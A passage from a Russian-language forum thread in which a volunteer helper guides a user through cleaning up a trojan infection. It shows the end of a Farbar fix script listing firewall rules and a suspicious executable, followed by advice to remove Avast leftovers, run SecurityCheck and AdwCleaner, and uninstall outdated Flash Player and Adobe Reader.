[{3FD53E9C-8781-4309-8C61-58BF8202A0D7}] => (Block) LPort=139 FirewallRules: [{40B1FB7E-4BFA-4C97-80B3-FAEAACCCA8B0}] => (Block) LPort=445 FirewallRules: [{F297BCA5-8E0F-40AA-B0FE-0051E993DCEE}] => (Block) LPort=139 FirewallRules: [{DC98D39F-DC11-4EBF-A80E-9827CAD7CE0D}] => (Block) LPort=445 FirewallRules: [{72EBF853-AAA3-4794-AF4B-BE30CE7BCD4B}] => (Block) LPort=139 FirewallRules: [{58046640-E355-4BCA-8EE6-AD0F1CFD7F69}] => (Block) LPort=445 FirewallRules: [{77468943-B1CD-4EAE-8E70-45F48C277643}] => (Block) LPort=139 FirewallRules: [{9B890834-0886-4988-8C31-0CF12CA9A04C}] => (Block) LPort=445 FirewallRules: [{3CACF5A9-8B76-4F6E-A852-79A01BE4FF58}] => (Block) LPort=139 FirewallRules: [{927A2811-9165-44EE-BC8F-CEE9E39491E9}] => (Block) LPort=139 FirewallRules: [{838FA8C4-BA1D-439A-A70D-4681A7681BBC}] => (Block) LPort=445 FirewallRules: [{E5C8340E-22A8-4E3F-971F-5D8A43583A67}] => (Block) LPort=445 FirewallRules: [{2AB0D53A-0752-41E8-9DB8-1EF49DCC5262}] => (Block) LPort=139 FirewallRules: [{767660AA-9579-4C03-B290-EF6194E902E9}] => (Block) LPort=445 FirewallRules: [{42D9C6AF-2DF9-4AF0-8C97-0E13A80B9A92}] => (Block) LPort=139 FirewallRules: [{34665F64-BDE9-434F-9AF3-CAF6827F84BE}] => (Block) LPort=445 FirewallRules: [{D318002E-B3FD-450E-AE46-AF0E33658CD1}] => (Block) LPort=139 FirewallRules: [{5A348483-13BE-4A51-A951-4CBA03EF355B}] => (Block) LPort=139 FirewallRules: [{33186D93-7EB5-4A94-9520-557BB2317F29}] => (Block) LPort=445 FirewallRules: [{39F49720-B9B7-4836-A138-AE71E7A710D1}] => (Block) LPort=445 FirewallRules: [{8B98CF15-17A8-4CC4-A1DB-1DA2FAF59775}] => (Block) LPort=139 FirewallRules: [{4B66FA9E-824F-4B43-A1E5-980A55626826}] => (Block) LPort=139 FirewallRules: [{DABD29F6-6060-4D38-B2E9-983AF300662D}] => (Block) LPort=445 FirewallRules: [{147EE8C7-815C-4E08-9AC9-F7CF909D61A9}] => (Block) LPort=445 FirewallRules: [{39D39C43-CC29-4DD0-A6D3-231805DF8473}] => (Block) LPort=139 FirewallRules: [{9B095D2C-CE0F-4241-9EE1-8E3EFEFB1344}] => (Block) LPort=445 FirewallRules: [{BB301F0E-0A04-4E87-857E-EAA441AB8813}] => (Block) LPort=139 FirewallRules: [{3E9781CD-1BFD-4EE4-A3AA-6606253633CE}] => (Block) LPort=139 FirewallRules: [{248EBCEE-8036-4562-93E4-C0E2285D4018}] => (Block) LPort=445 FirewallRules: [{F733278B-2B31-4998-B715-04710E41845C}] => (Block) LPort=445 FirewallRules: [{60001A5C-A733-47AF-9576-920274A283FF}] => (Block) LPort=139 FirewallRules: [{1F3C74A5-EAF7-42F6-9343-7421FE963107}] => (Block) LPort=139 FirewallRules: [{FA3ED540-F7B6-4EE0-9549-0BEF7424C296}] => (Block) LPort=445 FirewallRules: [{5F6F5F47-C3CF-4BA0-BA4C-170FC1B19A7D}] => (Block) LPort=445 FirewallRules: [{379F0FEB-7B2B-4BD8-AA7D-156BC4A3B8A7}] => (Block) LPort=139 FirewallRules: [{AC4858B1-C16B-419A-B9AF-83264EF57DD9}] => (Block) LPort=139 FirewallRules: [{87E25317-0863-4C93-8AD7-4EAF0CC43AD4}] => (Block) LPort=445 FirewallRules: [{D2B80767-0D00-4E33-8F60-20C2AC2664B7}] => (Block) LPort=445 FirewallRules: [{BFD51E96-C82A-46C2-93B9-C84EB293AA63}] => (Block) LPort=139 FirewallRules: [{F9CE8EF2-19DE-4AB7-BAA3-353B9C38BFBD}] => (Block) LPort=445 FirewallRules: [{ED3AC940-E513-47B0-B238-772350A6153C}] => (Block) LPort=139 FirewallRules: [{59A66F6F-463C-4E4D-9E6F-AC27D4AF945A}] => (Block) LPort=445 FirewallRules: [{D77E1EA9-5B72-49B5-89BD-8B3C584A5BE7}] => (Block) LPort=139 FirewallRules: [{04E48054-4392-4283-8050-0829AA5DF5AB}] => (Block) LPort=445 FirewallRules: [{86C88A73-6A64-4242-9160-3260C8C9A818}] => (Block) LPort=139 FirewallRules: [{9C2315BA-CB81-4F04-9B28-75572B63990A}] => (Block) LPort=445 FirewallRules: [{FE21507F-A8A8-4EE4-B331-364E1DEBBC66}] => (Block) LPort=139 FirewallRules: [{84B5628F-D6DC-47F4-9BD2-45AEF42589A7}] => (Block) LPort=445 FirewallRules: [{B7EEAF30-9F39-41DB-B59D-6F9579CF3ABC}] => (Block) LPort=139 FirewallRules: [{CB336C4A-F67D-43C0-BA65-D70078FD7D9D}] => (Block) LPort=445 FirewallRules: [{0F950DB6-B005-4EE3-A311-52BFC64BEBFD}] => (Block) LPort=139 FirewallRules: [{424DCF0B-B573-4836-9DFA-7886B1D3ED20}] => (Block) LPort=139 FirewallRules: [{8C39C34A-D57E-4B1C-84A2-032248CE41FA}] => (Block) LPort=445 FirewallRules: [{0B92F49B-D9D7-4608-862C-7A5693F56FC1}] => (Block) LPort=445 FirewallRules: [{47F2F948-DB2A-49E7-B057-9E64E65B6B83}] => (Block) LPort=139 FirewallRules: [{E50BC868-D752-43D0-8E82-FE8B66E8711A}] => (Block) LPort=139 FirewallRules: [{27898A66-42D0-41F7-AC6B-A810D910D334}] => (Block) LPort=445 FirewallRules: [{22C1D235-EAA6-482D-98A7-8DA55A67A4E1}] => (Block) LPort=445 FirewallRules: [{162C2AF6-F852-4839-B7F4-B2A0D4C0A5D8}] => (Block) LPort=139 FirewallRules: [{0AD11CF1-22ED-4EA1-95F5-63800F54CB77}] => (Block) LPort=445 FirewallRules: [{0400429A-8B67-4EBC-9F64-45EFD65D43F8}] => (Block) LPort=139 FirewallRules: [{8E2B6EC8-7BCC-483B-A6CD-5C5A822ADADA}] => (Block) LPort=445 FirewallRules: [{443F0DDD-8B73-4325-9E1E-866A3BB95241}] => (Block) LPort=139 FirewallRules: [{9DD6027A-8D69-44CA-86F9-E77C1F63483D}] => (Block) LPort=445 FirewallRules: [{86A2A479-6E08-427D-8995-A8091B863607}] => (Block) LPort=139 FirewallRules: [{2F599213-6FFD-4A16-9F2B-25942C893EEC}] => (Block) LPort=445 FirewallRules: [{D5D622E2-0070-4DE1-9617-7AF6F18AF50C}] => (Block) LPort=139 FirewallRules: [{1C6AF744-9B5C-4E23-B1AC-C14D8EEF53C7}] => (Block) LPort=445 FirewallRules: [{1EEADA03-8ACC-4D23-8156-E81E8716F09B}] => (Block) LPort=139 FirewallRules: [{9612A438-87CF-494D-981F-0CC0811633EA}] => (Block) LPort=445 FirewallRules: [{C46C6A8A-7108-4C93-85C3-6DA4BE77D248}] => (Block) LPort=139 FirewallRules: [{138EF67F-9253-46EC-B2C8-10EE6058AC76}] => (Block) LPort=445 FirewallRules: [{5B4C505A-B041-4A80-8178-1A8CDA536A85}] => (Block) LPort=139 FirewallRules: [{68BCDF59-41A3-41E7-A27C-A9FCBAF66A8F}] => (Block) LPort=445 FirewallRules: [{D6443418-B89E-44CE-8983-EB41210E4C3A}] => (Block) LPort=139 FirewallRules: [{2F6C4540-D1E1-42A7-B3BA-7ACDA09C03ED}] => (Block) LPort=445 FirewallRules: [{EC63B4D1-BC64-4183-BA04-334708881253}] => (Block) LPort=139 FirewallRules: [{46EFC63D-4F0B-4687-A7F3-932165607F8C}] => (Block) LPort=445 FirewallRules: [{9E20D785-58C5-4CF7-86E1-FE4C1278F5B1}] => (Block) LPort=139 FirewallRules: [{D5E1A64B-60C4-40D7-AE41-0F6F2F770DF6}] => (Block) LPort=445 FirewallRules: [{82153F17-D7AF-440C-8AEB-E40FF67B0A3D}] => (Allow) C:\Users\user\AppData\Roaming\Zoom\bin\Zoom.exe => Нет файла FirewallRules: [{5A914F6A-C45C-45D7-8A87-407A249F0FC2}] => (Allow) C:\Users\user\AppData\Roaming\Zoom\bin\airhost.exe => Нет файла FirewallRules: [{EC1422BD-ADFA-46B6-BADA-DB2728472518}] => (Allow) C:\Program Files (x86)\360\Total Security\softmgr\360InstantSetup.exe (QIHU 360 SOFTWARE CO. LIMITED -> Qihoo 360 Technology Co. Ltd.) FirewallRules: [{C791772A-8254-441B-8C95-E9D0F61B141F}] => (Allow) C:\Program Files (x86)\360\Total Security\softmgr\360InstantSetup.exe (QIHU 360 SOFTWARE CO. LIMITED -> Qihoo 360 Technology Co. Ltd.) FirewallRules: [{1F4C8B74-812E-4C2D-A9A8-CAC893E4BD98}] => (Block) LPort=445 FirewallRules: [{8AB06017-C353-4CDE-A0D7-A8A132834847}] => (Block) LPort=139 S1 MpKslaeeb4da8; \??\C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{7C4F1002-0B34-47A0-9679-DD65B6FA085C}\MpKslaeeb4da8.sys [X] Virustotal: C:\Users\user\Desktop\Помощник\Project2 (1).exe ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions Reboot: End::
Компьютер будет перезагружен автоматически.
Удалите остатки Avast! утилитой aswclear.exe в безопасном режиме.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
WBR,
Vadim
Выполните эти рекомендации.Adobe Flash Player 24 NPAPI v.24.0.0.221 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.
Adobe Reader 9.4.0 - Russian v.9.4.0 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Acrobat Reader DC.
Проблема решена?
Сделайте лог Malwarebytes AdwCleaner.
WBR,
Vadim
Какие рекомендации? У меня вот что отображается 12312312123.png
Так это и есть рекомендации. Что-то не ясно?
WBR,
Vadim
Все понял, я думал просто что должно было что-то отобразится на странице, но не может так как у меня нет флеш-плеера)
То есть мне просто удалить флеш поставить риадер и сделать лог и все?
Да. И Adobe Reader 9.4.0 предварительно удалите.
Троян не появлялся больше?
WBR,
Vadim